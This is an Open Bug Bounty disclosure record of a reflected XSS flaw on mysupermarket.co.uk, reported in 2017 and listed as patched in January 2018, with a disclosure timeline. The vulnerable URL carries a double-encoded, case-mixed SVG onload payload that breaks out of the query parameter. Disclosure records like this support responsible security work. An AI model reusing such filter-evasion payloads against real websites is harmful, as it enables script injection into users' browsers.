mysupermarket.co.uk XSS vulnerability

2017-11-29T20:47:00
ID OBB:442390
Type openbugbounty
Reporter Random_Robbie
Modified 2018-01-08T08:41:00

Description

Vulnerable URL:
http://www.mysupermarket.co.uk/Shopping/FindProducts.aspx?query=pasta%2522%2527--%253E%253CSvg%2520O%256ELoad%253Dconfirm%2528/OPENBUGBOUNTY/%2529%253E&store;=ASDA&sort;=Relevance&_fcategory=Pasta#
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 21036
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 29 November, 2017 20:47 GMT
Generic security notifications sent to website owner| 29 November, 2017 20:50 GMT
Vulnerability details disclosed by researcher| 7 January, 2018 16:20 GMT
Vulnerability patched by the website owner| 8 January, 2018 08:41 GMT